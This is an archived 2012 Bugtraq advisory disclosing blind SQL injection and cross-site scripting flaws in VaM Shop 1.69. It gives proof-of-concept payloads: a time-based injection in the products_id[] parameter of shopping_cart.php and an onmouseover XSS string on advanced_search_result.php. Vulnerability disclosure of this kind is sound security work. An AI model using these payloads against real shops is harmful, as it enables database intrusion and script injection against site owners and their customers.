lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-Id: <201210210712.q9L7C3DF005610@sf01web2.securityfocus.com>
Date: Sun, 21 Oct 2012 07:12:03 GMT
From: sec.team@...erservices.com
To: bugtraq@...urityfocus.com
Subject: VaM Shop Cross-Site Scripting and Blind SQL Injection Vulnerabilities

Product: VaM Shop
Vendor: Vamsoft ( http://vamshop.ru/ ) 
Vulnerable Version: 1,69 and probably prior versions.
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: High
Credit: Security Effect Team(http://seceffect.tumblr.com/)


Vulnerability Details:
1. Blind SQL injection in shopping_cart.php in parameter product_id[]. 
PoC: 
POST /shopping_cart.php?action=update_product

cart_delete[]=2071&cart_quantity[]=1&old_qty[]=1&products_id[]=2071' and sleep(2)%3d%27

2. Multiple XSS(cross-site scripting).
PoC:
/advanced_search_result.php/o" onmouseover=prompt(123) //

Copyright (c) 2012. Security Effect.

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ